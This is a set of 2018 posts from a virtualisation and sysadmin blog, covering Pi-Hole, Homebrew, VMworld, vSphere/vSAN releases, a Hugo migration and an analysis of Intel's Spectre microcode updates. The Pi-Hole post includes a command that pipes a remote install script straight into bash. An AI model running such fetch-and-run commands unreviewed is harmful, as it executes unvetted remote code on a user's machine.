bottom of the Settings -> DNS page, under Advanced DNS settings you’ll find something called Use Conditional Forwarding Configuring this to point to your local DNS server, as well as typing in the local domain name, enables Pi-Hole to forward everything that should be local, to the correct DNS server. Disregard the text explaining that you should point it to your router, it should really point to your local DNS resolver (which in many home networks is in fact your router, but not in my case). I could probably have used external DNS servers for the custom DNS servers for Pi-Hole, and just used this Conditional Forwarding for my local network, but I haven’t tested that and frankly I don’t really care if external DNS queries take an extra hop through the local DNS server after hitting the Pi-Hole. This setup also allows for ad and tracker free browsing when I VPN to my home network when on the move, since I’m technically just a client in the local network once I’ve connected either from my phone or my laptop — That’s a huge bonus, since not only is my traffic encrypted, it’s also sanitized at the same time. --- # Trouble Installing Pi-Hole on Ubuntu 18.04.1 LTS Bionic Beaver URL: https://vNinja.net/2018/10/08/installing-pihole-on-ubuntu-18.04.1/ Date: 2018-10-08 Author: christian Tags: Ubuntu, Linux, Blogtober2018, Pi-Hole Pi-Hole is a nifty little software package that acts as a ad and tracking blocking server for your entire network, or as the authors put it: Pi-Hole®: A Black Hole for Internet Advertisements. In reality it’s just a local DNS server that blocks out known advertising networks from your queries. Originally designed to run on a Raspberry Pi (hence the name), it can also run just fine on any Debian-based linux distribution, and it works just fine inside a VM. It is very lightweight as it only handles DNS queries and returns a blank HTML file for the blocked requests, it really doesn’t need much processing power. Hardware requirements # ~52MB of free space 512 MB RAM Installation of Pi-Hole is normally pretty straight forward, if you like to install things directly off the internet that is… Once you have your VM ready, with a static IP, SSH into it and run: fsociety@test:/$ curl -sSL https://install.pi-hole.net | bash In my case, on Ubuntu 18.04.1 LTS Bionic Beaver, this seemed to run fine, but after a very quick screen flash, it just stopped, looking like this: fsociety@test:/$ curl -sSL https://install.pi-hole.net | bash [✗] Root user check [i] Script called with non-root privileges [i] The Pi-hole requires elevated privileges to install and run [i] Please check the installer for any concerns regarding this requirement [i] Make sure to download this script from a trusted source [✓] Sudo utility check [✓] Root user check .;;,. .ccccc:,. :cccclll:. ..,, :ccccclll. ;ooodc 'ccll:;ll .oooodc .;cll.;;looo:. .. ','. .',,,,,,'. .',,,,,,,,,,. .',,,,,,,,,,,,.... ....''',,,,,,,'....... ......... .... ......... .......... .......... .......... .......... ......... .... ......... ........,,,,,,,'...... ....',,,,,,,,,,,,. .',,,,,,,,,'. .',,,,,,'. ..'''. [✓] Disk space check [✓] Update local cache of available packages [✓] Checking apt-get for upgraded packages... up to date! [i] Installer Dependency checks... [✓] Checking for apt-utils [i] Checking for dialog (will be installed) [✓] Checking for debconf [i] Checking for dhcpcd5 (will be installed) [✓] Checking for git [✓] Checking for iproute2 [✓] Checking for whiptail fsociety@test:/$ Well, That is strange. It just stopped, no error messages or anything. Turns out the reason it stopped here is because the dialog and dhcpd5 packages are missing from the system and it is unable to install them, even if it does say that they “will be installed”. Dialog is basically a utility that lets you build user interfaces for scripts, and guess what? The Pihole installer is based on it being available. Since installations of Ubuntu 18.04.1 LTS Bionic Beaver using the LiveCD ISO is missing the Universe repositories, the Pi-Hole installer is unable to install its requirements, and just stops in its tracks. To get any further, you will have to fix your sources.list to make sure you have the Universe repositories and re-run the installer afterwards. Once that is done, re-run the Pi-Hole installer and it should run just fine, presenting you with a screen similar to this: From there, you can go on and confgure it to suit your setup. I will not go through the configuration of Pi-Hole in this post, I will save that for a later post where I go through how it is configured in my home network, with internal upstream DNS servers. My setup also makes this my default DNS server for VPN connections, making me ad-blocked while mobile as well. Awesome. I will say this though, this thing works extremely well: That’s nearly 24% of all requests from my home network blocked before it hits the internet. That is a lot! --- # macOS: Homebrew error in macOS 10.14 Mojave URL: https://vNinja.net/2018/09/25/homebrew-in-mojave/ Date: 2018-09-25 Author: christian Tags: Homebrew, macOS Just a quick note to everyone jumping on the new macOS Mojave release. I’m a big fan of Homebrew, and after upgrading macOS I figured it would be a good idea to upgrade Homebrew as well.  ~ $ brew update ==> Downloading https://homebrew.bintray.com/bottles/git-2.18.0.mojave.bottle.ta ... ==> Summary 🍺 /usr/local/Cellar/git/2.18.0: 1,488 files, 296.7MB Error: Git must be installed and in your PATH! Well, that’s strange, Homebrew was working just fine before the upgrade. Turns out that the Mojave upgrade didn’t also upgrade my Xcode Command Line tools, which causes this error when upgrading Homebrew. Luckily there is a really quick fix for this; just install the Xcode command line tools!  ~ $ xcode-select --install xcode-select: note: install requested for command line developer tools Let that run, and Homebrew upgrades itself without problems.  ~ $ brew update Updated 2 taps (homebrew/core, homebrew/cask). I’m expecting some other upgrades to Homebrew in soonish, since it still considers Mojave (macOS 10.14) to be a pre-release version so official support isn’t quite there yet. --- # VMworld Europe 2018 Sessions and Some Advice URL: https://vNinja.net/2018/09/25/vmworld-europe-2018-sessions/ Date: 2018-09-25 Author: christian Tags: VMworld, VMware, VMworld 2018 Get your scheduling hat on, and get on it now before all the sessions you would like to attend are unavailable! VMware has opened the session builder for VMworld Europe 2018, and quite a few sessions are already fullly booked. Do not despair though, if your chosen session is full, there is still a chance that some sessions will get additional slots, as well as the possibility for walk-ins at the time of the sessions. Odds are that quite a few people who have scheduled a given session don’t show up and that will open up slots for those waiting at the door. There is also the option to download the sessions you don’t get a chance to attend live. Check out William Lam’s list of Direct playback & download URLs for all VMworld 2018 US Sessions — the European ones will naturally be available after VMworld Europe 2018. As a rather seasoned VMworld attendee, I will offer some advice; Do not go overboard when scheduling. It’s easy to cram in loads of sessions in your schedule, but if you do that I can guarantee that you will not be able to attend them all! You do not want to have 3 days fully packed with sessions, end-to-end, without a chance to breathe between them. You will only end up running between conference rooms, and wear yourself out to the point where you will not be able to absorb the information in the sessions you attend anyway. Choose and pick a select subset of the sessions. Check their descriptions properly, and make sure they are at the level of technicality you’re looking for. There quite a diffference between and overview and a deep dive, at least there should be. If you are in doubt, you sre probably better of downloading the US version of the session and watch it when you have time, or wait until the European video is published and see if after the conference. A couple of other scheduling tips # The sessions are not listed by day, but if you search for “tuesday”, you’ll get the sessions for that day. Use the My Schedule view to pick a time slot you want to fill, hit the + sign and find a session for that slot. This makes it easier to make sure you have air between your scheduled sessions! Use the Add Personal Time option wisely. Take blocks of time out of your schedule, and think about want you want to use it for. Perhaps visit the Solutions Expo and that vendor booth you wanted to check out, or hang out in the blogger space. Check out the VMTN/vBrownbag schedule (search for VMTN), loads of great content is scheduled there as well so make sure you account for that too. VMworld is so much more than the sessions. It is fun and for many (including me) it’s mostly meeting new and old friends and frankly, it is exhausting. Remember to take time to decompress and relax as well! VMworld is a marathon, it is not a sprint! See you there! --- # macOS: Lulu URL: https://vNinja.net/2018/09/12/software-lulu/ Date: 2018-09-12 Author: christian Tags: macOS, Firewall, Security LuLu is a small, shared-source macOS application level firewall that’s finally reached v1.0. Unlike other macOS firewall solutions, LuLu is 100% free, with no ads and no trial version. I’ve been using it on my home Mac Mini for a while, and it works perfectly — Most of the time I don’t even notice it’s there, until a new application or service tries to access anything on the network when it pops up asking if that’s ok. Perfect. For more details, check the official site. --- # Headshot Studio @ VMworld Confirmed URL: https://vNinja.net/2018/09/10/headshot-studio@vmworld-confirmed/ Date: 2018-09-10 Author: christian Tags: VMworld, VMware, vExpert I’m very happy to announce that I can now confirm that Headshot Studio @ VMworld will happen! Mainly due to Tom Dodds and 10ZiG, who has stepped up as a sponsor! This means I’ll be able to set up a small headshot studio, complete with multiple light sources, a background, and softboxes! Huge thanks to both Tom and 10ZiG! I’m still looking for a place at the Fira to host it all, as well as the details on how to actually organize it, but so far so good. The logistic challenges of getting the required equipment to Barcelona has been solved, the rest is pretty much up to me. I have a couple of feelers ut there with regards to the physical location, but I’ll have to get back to that closer to the event. Thanks to Dave Simpson, who coined the term HaaS aka Headshot-as-a-Service for this! I’d be up for this too, great idea and offer mate! Headshot as a Service #HaaS — Dave Simpson (@bfd_diplomacy) September 3, 2018 I’d also like to thank the vBrownbag crew who actively supporting this! Thanks for all you do for the vCommunity guys, it’s greatly appreciated! More details to come, closer to VMworld Europe 2018, including more details on the where, when and how, as well as a sign-up form. See you there! --- # IT Architect Series: Designing Risk in IT Infrastructure URL: https://vNinja.net/2018/09/04/designing-risk-in-it-infrastructure/ Date: 2018-09-04 Author: christian Tags: Recommended, Reading, Books Designing Risk in IT Infrastructure # Disclaimer: I have contributed to this book as a reviewer, for no compensation other than receiving a free copy. Another must-have book for system administrators and architects has been published! By Daemon Behr Paperback: 416 pages Publisher: Daemon Behr (August 10, 2018) Language: English This book wil help you understand what risk really is, a variety of different risk factors and how to mitigate them. Do you know what risks exist for a given solution, and why? Do you factor in, and calculate risk when designing the architecture? If so, how do you do it? Risk analysis, do we need it? Daemon does a great job explaining all of this, and risk analysis is an often underappreciated exercise that we leave to late in the design process: A book that talks about the thing we often overlook when designing solutions for anyone….the inherent trade off between risk/cost/functionality. https://t.co/6y3yXwv5jk — Mark Gabryjelski (@MarkGabbs) August 30, 2018 Besides having a wealth of information, perhaps sometimes to much to ingest in a single sitting, it’s also packed with great (and funny) examples, quotes and historical factoids. This is a book you’ll have to read more than once, and use as a reference later on. This book shows you how to not be a pig. Daemon Behr in Designing Risk in IT Infrastructure Order Designing Risk in IT Infrastructure now, I promise you won't regret it. This is the third book in the IT Architect Series, after Foundation In the Art of Infrastructure Design: A Practical Guide for IT Architects and The Journey: A Guidebook for Anyone Interested in IT Architecture Note: My recommendation of the book is based on the chapters I’ve reviewed, and not the final printed product. --- # Headshot Studio @VMworld? URL: https://vNinja.net/2018/09/02/headshot-studio@vmworld/ Date: 2018-09-02 Author: christian Tags: VMworld, VMware, vExpert Over the last couple of weeks an idea started to form, an idea that would try to combine two of my passions; The vCommunity and photography. In short, the idea is to set up some kind of mini-studio at VMworld Europe, and offer free headshots to those who might be interested. And yes, it’ll be me doing the photography, not some fancy pro-photographer. I’m considering setting up a photo “headshot studio” at #VMworld Europe, and some kind of schedule/signup. Would anyone be interested in that? The idea is to take free Profile/CV shots for anyone interested (time permitting). — Christian Mohn™ (@h0bbel) September 2, 2018 So far there seems to be quite a bit of interest in doing this, so I’ll try to make it happen! I’ll show up with my camera, you just show up. I might have bitten over more than I can chew though, especially considering that there were 14.000 attendees at VMworld Europe 2017. I have no idea, yet, what my schedule at VMworld Europe 2018 looks like but my plan is to block out an hour of each conference day (5-8 November) for this on a first-come-first-served basis. The plan is to set up the small studio, take the headshots and publish them all publicly (probably in a Flickr album) with a Public Domain Dedication (CC0) license — Free for all to use. Of course, there are quite a few practical and logistical issues to deal with in order to actually making this a reality, most pressing is the need for a proper location for the shoots, or getting hold of a backdrop setup that I can use anywhere. All of the collapsibe backdrops I’ve found so far are simply to large for me to stick in my suitcase. If someone who’s reading this works for a vendor that would be interested in sponsoring this, please reach out and perhaps we can work something out. I’m not talking about huge monetary sponsorships here, perhaps only some help with getting hold of some cheapish equipment and some logistics. --- # VMware Cloud on AWS — New Amazon EC2 elastic, bare-metal instance for vSAN URL: https://vNinja.net/2018/08/26/vmware-cloud-on-aws-news/ Date: 2018-08-26 Author: christian Tags: VMware, VMworld 2018, VMware Cloud on AWS VMware vSAN utilizing Amazon Elastic Block Storage (EBS) is an interesting one. Being able to independently increment storage in the VMC without adding compute nodes is a feature that has been missing, until now. Customers of VMware Cloud on AWS will now be able to scale storage independently of compute, by adding new EBS storage nodes. Overview # R5.Metal Physical Host Configuration # ​3 disk groups per host All storage provided by EBS GP2 Raw capacity tier of 15-35TB Configured at Cluster creation 5TB increments ​Compression Enabled Item Available CPU Skylake-SP Sockets per Host 2 Cores per Socket 24 Cores per Host 48 Threads per Host 96 Memory 768 GB Storage EBS GP2 NICs 1 x ENA Note: This new storage cluster needs to be added to an existing SDDC and cannot be the first cluster that is provisioned in the customer environment. --- # VMware vSAN 6.7u1 — What's New? URL: https://vNinja.net/2018/08/26/vsan67u1-whats-new/ Date: 2018-08-26 Author: christian Tags: vSAN, VMware, VMworld 2018 VMworld 2018 US is upon us, and as per usual this means a lot of new announcements. One of them is vSAN 6.7u1 which comes with a bunch of new and useful features. This release mainly focuses on improved operations and maintenance, with a bunch of nice new additions. I’ve focused on a couple of them here, but this is not a defintive list! Simplified Upgrade Experience Through VMware Update Manager (VUM) # Firmware and drivers for vSAN has now been moved into VMware Update Manager (VUM) for centralized management, this means that the vSAN IO Controller Firmware Tool now integrated into VUM. Features # ​Retrieves and updates firmware for the vSAN Cluster Supports custom ISOs for OEM specific builds Supports Dell HBA330 updates Supports vCenter without internet connectivity Per-host updating with additional safeguards Included in system-managed baselines Cluster Quickstart # The vSphere Cluster Quickstart is a new cluster, host and network configuration workflow. It enables easy addition of new or existing hosts, in bulk, with built-in pre-checks and recommendations. It complements the vSAN Easy Install wizard, for end-to-end greenfield deployments. Improved Space Efficiency Using Storage Reclamation # Yes! Finally we get space reclamation from guests on vSAN as well. TRIM/UNMAP integration Features # Reclaimed guest OS capacity Reclaims storage for vSAN Reduces use of destager Supports guest OS initiated TRIM/UNMAP commands Windows Server 2012 or Windows 8 and newer Linux supporting ext4, xfs, btrfs, etc. Automated using guest OS online mode Scheduled mode supported Improved Resource Decommissioning Safeguards # Enter Maintenance Mode’ (EMM) operational improvements which includes a ​EMM “fail fast” pre-check simulation which determines success/failure with no data movement ​New warnings for: Hosts already in maintenance mode Ongoing resyncs Multipledecommission actions Object repair timer adjustment available in UI Other items # Improved vSAN Cluster Capacity insight, with historical capacity, deduplication and compression reports A new usable capacity estimator, whoch takes the selected storage policy into account and easy estimation of “what if” when using space efficient RAID-5/6 Enhancements to vRealize Operations within vCenter, where dashboards are now capable of displaying vSAN stretched cluster intelligence with full Interoperability with vRealize Operations v7.0 New PowerCLI 10.2 cmdlets that replace 18 Ruby vSphere Console (RVC) commands. Greater visibility into Cluster configuration info, Resyncing status, Healthchecks object info and status as well as vSAN disk stats There are other improvements as well, but I’ll leave those to a later post — Preferrably once I get my hands on the actual vSAN 6.7u1 bits! Happy VMworld everyone, and happy 20 Year Anniversary VMware --- # VMware vSphere 6.7u1 — What's New? URL: https://vNinja.net/2018/08/26/vphere67u1-whats-new/ Date: 2018-08-26 Author: christian Tags: vSphere, VMware, VCSA, VMworld 2018 vSphere 6.7u1 Announced at VMworld 2018 US # Another VMworld, another vSphere announcement. vSphere 6.7u1 comes with a bunch of new features and capabilities, some of which are listed below: Feature Complete HTML5 Client # Finally the HTML5 client is feature complete! It’s been a long wait, but in v6.7u1 it’s here! With improved search, support for Auto Deploy, Host Profiles and vCenter High Availability (VCHA) this is your new home as a vSphere admin. vCenter Appliance Improvements # vCenter High Availability (VCHA) vSphere Client (HTML5) improved workflow Auto detects when VCSA is being managed REST APIs Auto clone creation option for passive and witness nodes Monitoring & Alerting Built-in Firewall The vCenter Appliance now comes with a built-in firewall that is manages through VAMI. Converge Tool This new tool enables moving of external PSC’s (even load balanced ones) into an internal PSC, which is the preferred option going forward. Improved Content Library Deploy from, Clone to, and Sync OVF and OVA templates Guest customization Support for native OVA and VMTX Deploy from or Clone to ISO mounting support Store other files such as scripts Cluster Quickstart The vSphere Cluster Quickstart is a new cluster, host and network configuration workflow. It enables easy addition of new or existing hosts, in bulk, with built-in pre-checks and recommendations. This complements the vSAN Easy Install wizard, for end-to-end greenfield deployments. Happy VMworld everyone, and happy 20 Year Anniversary VMware --- # Book Recommendations August 2018 URL: https://vNinja.net/2018/08/16/book-recommendations/ Date: 2018-08-16 Author: christian Tags: Recommended, Reading, Books Book Recommendations August 2018 # Every now and then new vSphere related “must-have” books are released, and this month there is no less than two of them, namely the vSphere 6.7 Clustering Deep Dive and VDI Design Guide: A comprehensive guide to help you design VMware Horizon, based on modern standards. vSphere 6.7 Clustering Deep Dive # This updated version (the 5th version) covers vSphere 6.7, and it’s a real brick. Written by Frank Denneman, Duncan Epping and Niels Hagoort, clocking in at 566 pages in total, it contains a wealth of knowledge! Topics covered: vSphere HA vSphere DRS vSphere Storage DRS vSphere Storage I/O Control vSphere Network I/O Control vSphere Stretched Clusters I’d like to hightlight the last one on that list; Stretched Clusters or vSphere Metro Storage Cluster (vMSC). This chapter is an entire use-case, with requirements and constraints and a real world implementation scenario. It includes, amongst other things, DRS/HA settings, affinity rules, and detailed failure scenarios. That chapter alone is worth the cost of the book! Combined with the vSphere 6.5 Host Resources Deep Dive, you get the vSphere 6.x Deep Dive Resource Kit — Something that every vSphere administrator out there should have readily available. I’ve purchased both these for the entire SDDC-team in Proact Norway; they are just that essential. VDI Design Guide: A comprehensive guide to help you design VMware Horizon, based on modern standards # The winner when it comes to the longest book title, by far, is this book by Johan van Amersfoort (The Bearded VDI Junkie). Besides it’s long, and impressive title, it is a must have for anyone looking at Virtual Desktop Infrastructure (VDI) for their environment. Based on the VMware VCDX methodology, it guides you through the many potential pitfalls when it comes to virtualizing your desktops and end-user applications, as well as serve a great go-to reference. Real-world scenarios always make for the best learning experience, and this book is based around just that. Topics covered: Sizing Multi-site Architectures VDI in SDDC environments (NSX/vSAN) Profile Strategies Application Delivery Windows 10 as a VDI Desktop OS Monitoring and Security GPUs Well done Johan, and I love those whiteboard-style diagrams! Support these great authors and their efforts, and grab your copies now! Trust me, they're all are well worth it! --- # Migrating From Wordpress to Hugo URL: https://vNinja.net/2018/07/22/migrating-from-wordpress-to-hugo/ Date: 2018-07-22 Author: christian Tags: vninja, site, news, hugo, wordpress Migrating From Wordpress to Hugo aka The Long and Winding Road When I decided to move away from Wordpress and over to Hugo, I really had no concept of the amount of work it would be. Simply put; I just decided to do it — without really knowing what I set out to do. Once I had decided on a foundation theme, I chose the Hugo Bootstrap Premium as my starting point, the real work started. The first challenge I had, was to get all the existing content moved over to Hugo. Hugo is entirely Markdown based, which ment I would have to find a way to export all the Wordpress posts in a format that Hugo could work with. After trying several Wordpress based plugins, that really didn’t get the job done, either because the plugin itself had issues or that my hosting providers setup didn’t match the requirements (or timed out while trying). In the end, I decided to give Exitwp a try. In essence, Exitwp works with a “normal” Wordpress XML export, which meant that I could do an export, and then work with the exported data locally (for details, check the documentation). Exitwp is designed for use with Jekyll, it works perfectly fine with Hugo as well. Basically what Exitwp does is to convert the existing Wordpress posts into Markdown files, with the publish date and post title as the filename (example: 2018-01-29-bootbank-cannot-be-found-at-path.md) This created a great foundation, as all the existing posts where now converted to Markdown, with existing metadata in the Front Matter. After conversion, my posts Front Matter looked like this example: --- author: cmohn comments: true date: 2018-01-29 22:49:53+00:00 type: post slug: bootbank-cannot-be-found-at-path title: Alerting on "Bootbank cannot be found at path ‘/bootbank’" in vRealize Operations url: /vmware-2/bootbank-cannot-be-found-at-path/ wordpress_id: 4963 categories: - VMware tags: - Alerting ... --- Great! The url: parameter there is fantastic, as it means that old URLs would still work as before, even Hugo generates a new URL for them, with my preferred /:year/:month/:day/:filename/ format (because I believe easiliy accessible date information is pretty crucial). Win! Also, note how easy it is to have multiple URLs pointing to one post in Hugo! Also, if you want more, there is always the Alias: parameter. I then did a quick Search and Replace in all the files, replacing cmohn with Christian Mohn. I don’t really need the comments or wordpress_id metadata there anymore, but there’s really no harm in it being there, so I left them. Once that was done, I copied all my posts from the Exitwp conversion directory, to my Hugo /content/posts directory and all my posts showed up in Hugo locally! Awesome! Everything looked OK, until I realized that all the image references were pointing to the existing absolute URL, which worked fine locally (as they pointed to the still running Wordpress site when I ran the local Hugo server) but that would break spectacularly once once I pointed the domain to the new location. I’m glad I caught that one before cutting over the domain! Sadly this was a real pain to fix, due to the following issues: My general non-proficiency in regexp. Wordpress is kind of stupid when it comes to uploads as it places uploaded files into wp-content/uploads/{year}/{month}/{filename}. This made it hard to do a general search and replace for all the image references, so I pretty much went through each end every post fixing and cleaning up the image URLs. Once that was done, I also noticed that there was quite a lot of other Wordpress specific things I needed to clean up. All posts I had with code snippets in them needed to be fixed, as they were littered with Wordpress Plugin specific code tags. All posts that had images with captions also needed deletion cleanup, any Wordpress galleries as well as all embeds that I had (Twitter, Youtube etc.) The next thing I did was to go parse through the image files in my /img/ folder, and optimize them. I used jpegoptim and optipng to accomplish that: jpegoptim # find . -name "*.jpg" -exec jpegoptim -m80 -o -p --strip-all {} \; optipng # find . -name "*.png" -exec optipng -o7 {} \; By running this on my new img directory, which took quite a while on a total of >2.5k files, I got a reduction of ~47 % or 187 MB, from 393,9 MB to 206,6 MB, without any noticeable quality degradation. And that just about covers it, my Wordpress to Hugo migration, a short story long. --- # Hello, My Name Is Hugo (Montoya) URL: https://vNinja.net/2018/07/19/hello-my-name-is-hugo/ Date: 2018-07-19 Author: christian Tags: vninja, site, news, hugo, wordpress Goodbye Wordpress, hello Hugo! # vNinja.net has been powered by Wordpress since it was launched back in 2010, and frankly it was time for a change. What really triggered it, was my hosting providers unwillingness to upgrade basic things, like PHP versions and MySQL. That combined with the security issues you have to live with when using traditional shared hosting made me look around for alternatives. While looking at hosting options, it slowly dawned on me that perhaps I should be looking at doing something completely different. After looking around a bit, I started playing with Hugo, and it just kind of stuck with me. The allure of everything being static, just plain old files written in Markdown was just impossible to resist. So, what you’re accessing right this very moment, is the new vNinja, in its new Hugo powered static glory over HTTPS-only! When I discovered that I could combine Hugo, Github and Netlify it just clicked. I can now edit — and preview — locally, wherever I am, check in changes to GitHub and the Netlify’s Continous Development takes care of updating the site automatically: I’ve even created a Slack-bot that notifies me of the status of the checking and publishing, to make sure I catch it when I mess things up: Added bonus: Being able to use whatever editor I fancy to edit this thing, at the moment Visual Code looks like it will do the job just right. I’ve spent quite a few hours playing around, exporting all the existing vNinja content out from Wordpress and convert them over to the new Hugo format (and writing a new about page), and I’ve tried to make all old URLs work. I’ve updated quite a few posts with proper Markdown syntax, and I think I’ve managed to get most of the kinks ironed out. If you notice anything that looks weird, let me know via Twitter. There is a few things I know isn’t working, or missing: Search is missing, I’ll add that later — Sneak preview here Author pages for guest authors, and how to handle multiple authors/guest posts in general. Various theme tweaks — it’s a work in progress. Please provide feedback, if you have it. Favicon is not working right now, need to intestigate that. Not quite HTTPS only at this point, seems I might have to change some things to make that happen. The theme itself is a work in progress, expect changes or breakage. Or both. I’ll do a writeup of the Wordpress to Hugo conversion process, and challenges I met, as well as the Netlify setup later on. For now, I just wanted it to go live. --- # I've Complied, I think. URL: https://vNinja.net/rant/ive-complied-i-think/ Date: 2018-05-22 Author: christian Tags: GDPR Like Sam and Simon over at definit.co.uk I’ve done a quick GDPR-related overhaul of the site. Like the two English scholars and gentlemen, I’ve created the required Privacy Policy page. I’ve also deleted all existing comments on the site, and disabled comments sitewide — hopefully that’s enough. Oh, joy. --- # Keynote: Crossing the River by Feeling the Stones - Simon Wardley URL: https://vNinja.net/awesometalks/crossing-river-feeling-stones/ Date: 2018-05-09 Author: christian Tags: AwesomeTalk, Keynote, video, Youtube This is the third talk I’ve found worthy of publishing in the Awesome Talks series. Enjoy Simon Wardley’s Researcher, Leading Edge Forum, keynote from KubeCon + CloudNativeCon Europe 2018 called “Crossing the River by Feeling the Stones”. Simon’s presentation technique, flair and master of language is flat out impressive — and fun! Crossing the River by Feeling the Stones # Now, do you know what a map is? Do you, really? --- # Alerting on "Bootbank cannot be found at path ‘/bootbank’" in vRealize Operations URL: https://vNinja.net/vmware-2/bootbank-cannot-be-found-at-path/ Date: 2018-01-29 Author: christian Tags: Alerting, vRealize Log Insight, vRealize Operations, vRLI, vROps, vSphere If you boot your ESXi hosts from SD-cards or USB you might have run into this issue. Suddenly your host(s) displays the following under events: “Bootbank cannot be found at path ‘/bootbank’.” Usually this means that the boot device has been corrupted somehow, either due to a device failure or other issues. Normally the host continues to run, until it’s rebooted that is… For some reason, vRealize Operations doesn’t pick this up as a host issue that it alerts on, so if your alerting regime is based on vROps alerts, you might not get alerted immediately. Thankfully there is a way to remedy this, and have vROps and vRealize Log Insight work together at the same time. On order for this to work, you need to have configured the vRealize Log Insight Integration with vRealize Operations first. Log in to Log Insight and search for **“Bootbank cannot be found at path ‘/bootbank’.”. **If you want to restrict it even more, use two filters. One for vc_event_type = exists, and one for the text search itself. Click on the little red bell icon and select “Create Alert from Query”. This will bring up the “Edit Alert” window, where you can define your information. Create a proper Description and Recommendation for the alert, and enable “Send to vRealize Operations Manager”. You also need to specify a Fallback Option. The Fallback Option is basically which object Log Insight should attach the alert to, if the originating object isn’t found in vRealize Operations. And that’s it really, as long as the vLI and vROps integration is configured and working, it’s easy add your own custom alerts in vRLI, and have them pop up in vROps. If you want to copy my Description and Recommendations, here they are: Description # “The device containing the VMware ESXi bootbank can not be found. This may be because of a boot device failure. Specific details should be available in the symptom details. For more information, check the Tasks & Events pane for the host in the vSphere Web Client” Recommendation # “Change or replace the boot device, if necessary. Contact the hardware vendor for assistance. After the problem is resolved, the alert will be canceled when the sensor that reported the problem indicates that the problem no longer exists.” --- # The Curious Case of the Intel Microcode Part #2 - It Gets Better — Then Worse URL: https://vNinja.net/news/curious-case-intel-microcode-part-2-gets-better-worse/ Date: 2018-01-14 Author: Tags: Analysis, Intel, Meltdown, Security, Spectre, VMware This guest post by Bjørn Anders Jørgensen, Senior Systems Consultant Basefarm, first appeared on LinkedIn. Before you start on this rather long post, have a go at part #1: tl;dr # This is a long read. To get to the juicy part on how Intel potentially shipped pre-release microcode to partners, skip to section 3. The short, short version is that the official Intel microcode update contains newer microcode for Skylake-SP and Kaby Lake/Coffe Lake than what currently is shipping from VMware/HPE/DellEMC etc. Section 1: The good # Last week I wrote about how Intel should improve their microcode update delivery mechanism and offer full disclosure on their microcode changes. Then this week events progressed in rapid succession: Intel released updated microcode bundle 20180108 VMware released updated patches for vSphere, including microcode updates Then it was discovered that the updates cause stability issues Most computer vendors recalled BIOS updates for Haswell/Broadwell VMware recommended not to expose VMs to the new CPU feature flag I discovered that Xeon SP and Kaby Lake/Coffe Lake updates from most or all vendors is based on the pre-release Intel bundle 20171215! First of all I have to say I feel for all the engineers and product managers taken by surprise when the news broke early on the Meltdown and Spectre vulnerabilities. Apparently the embargo was suppose to be lifted on the 9. January, and everyone was working towards this date. There must have been extreme pressure from peers and customers. Mistakes will be made, but could have been avoided if Intel was more transparent on their process and releases. Lets start with the Intel microcode bundle. Deconstructing the bundle using MC extractor you’ll find 94 binary files containing 196 individual microcode updates. Intel has released a single bundle with all updates going back to 1998. This is good! As far as I know there has not been a single update bundle going back this far. Additionally all vSphere patches contains microcode updates for most production systems running vSphere, including an update for AMD EPYC processors as described in the security advisory. You can find all the details on my github repository. This is progress - however there are still no release notes or details except for the updated microcode versions for each processor family: - Updates upon 20171117 release -- IVT C0 (06-3e-04:ed) 428->42a SKL-U/Y D0 (06-4e-03:c0) ba->c2 BDW-U/Y E/F (06-3d-04:c0) 25->28 HSW-ULT Cx/Dx (06-45-01:72) 20->21 Crystalwell Cx (06-46-01:32) 17->18 BDW-H E/G (06-47-01:22) 17->1b HSX-EX E0 (06-3f-04:80) 0f->10 SKL-H/S R0 (06-5e-03:36) ba->c2 HSW Cx/Dx (06-3c-03:32) 22->23 HSX C0 (06-3f-02:6f) 3a->3b BDX-DE V0/V1 (06-56-02:10) 0f->14 BDX-DE V2 (06-56-03:10) 700000d->7000011 KBL-U/Y H0 (06-8e-09:c0) 62->80 KBL Y0 / CFL D0 (06-8e-0a:c0) 70->80 KBL-H/S B0 (06-9e-09:2a) 5e->80 CFL U0 (06-9e-0a:22) 70->80 CFL B0 (06-9e-0b:02) 72->80 SKX H0 (06-55-04:b7) 2000035->200003c GLK B0 (06-7a-01:01) 1e->22 Note that 20171117 is Intels previous official release Keep a mental note for version 80 for Kaby Lake/Coffee Lake and 200003c for Skylake-SP (Xeon SP). Also note the absence of Sandy Bridge updates. Section 2: The bad # With new microcode and OS patches available, tens if not hundreds of thousands of IT professionals spend much of last week planning and executing mitigation for the Meltdown and Spectre vulnerabilities. And with Spectre variant #2 (Branch Target Injection) requiring microcode update, I will assume most also started deploying updated BIOS and Intel patches through the OS mechanism for Linux and vSphere. With the wider deployment it did not take long for customers to discover there where issues with system crashes or “higher system reboots” as Intel marking tries to spin it. How are system administrators suppose to make a informed decision based on that? It is quite ironic that Intel CEO, Brian Krzanich at the same time makes his “Security-First Pledge” offering “Transparent and Timely Communications”. It seems like Lenovo is the only vendor with some actual details on the issues: (Kaby Lake U/Y, U23e, H/S/X) Symptom: Intermittent system hang during system sleep (S3) cycling. If you have already applied the firmware update and experience hangs during sleep/wake, please flash back to the previous BIOS/UEFI level, or disable sleep (S3) mode on your system; and then apply the improved update when it becomes available. If you have not already applied the update, please wait until the improved firmware level is available. (Broadwell E) Symptom: Intermittent blue screen during system restart. If you have already applied the update, Intel suggests continuing to use the firmware level until an improved one is available. If you have not applied the update, please wait until the improved firmware level is available. (Broadwell E, H, U/Y; Haswell standard, Core Extreme, ULT) Symptom: Intel has received reports of unexpected page faults, which they are currently investigating. Out of an abundance of caution, Intel requested Lenovo to stop distributing this firmware. With all the system manufacturers removing their BIOS downloads for Haswell and Broadwell and VMware recommending to “hide the speculative-execution control mechanism for virtual machines” if patches have already applied, this cannot be described as nothing short of an industry wide recall. It is hard to say how bad it is, but if it is so bad that Intel is recalling the update and CEO and EVP posting publicly I think it is wise to await further updates and see how things pan out. Intel will release updated microcode soon and the various vendors will post new BIOS updates in the coming few weeks. Go to the VMware link and note the various processors affected in yellow, because it gets worse: Section 3: The ugly # Disclaimer: The following analysis is made with best effort on little information. Intel is shipping old and new versions in their microcode update bundle. It may be that they are for different CPU steppings of the same processor. While all this is unfolding I am trying to piece together what the Intel and VMware patches actually contains. Using MC extractor I was able to inspect the microcode bundles, map the updates to CPU models and cross reference different releases. The complete list is on github. In the rush to get patches out, it seems like Intel made some last minute changes that was not communicated to partners. I have been in contact with several vendors and none seems to be aware that there changes made between the unofficial pre-release bundle from 15. December that was shared under embargo. Luckily this only affect three processor generations, but combined with the Haswell/Broadwell issues, it leaves us with an awful mess and a potential open vulnerability. To quote my one week younger self: # So with six months lead time Intel has not been able to release an official microcode bundle update. The latest official one is from 17. November and does not seem to contain any Spectre 